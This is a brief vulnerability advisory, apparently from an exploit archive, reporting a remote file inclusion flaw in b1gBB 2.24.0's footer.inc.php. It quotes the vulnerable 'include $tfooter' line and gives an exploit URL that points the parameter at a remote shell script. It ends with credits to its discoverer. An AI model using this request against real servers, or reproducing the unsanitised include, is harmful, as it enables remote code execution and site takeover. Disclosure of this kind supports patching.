b1gbb version 2.24.0 suffers from a remote file inclusion vulnerability in footer.inc.php.
e2a5e4bddbf4ba8b7fb8fb88a180dd73265cc81a590f679384809d32e04a0f66
# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
Vulnerabilities
# D.Script :
http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip
# V.Code :
include $tfooter
# In :
footer.inc.php
# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?
# Discovered by:
Rf7awy
x59@hotmail.it
thanks
Mahmood_ali
# Homepage:
http://www.Tryag.Com/cc
# Sp.Thanx To :
Tryag-Team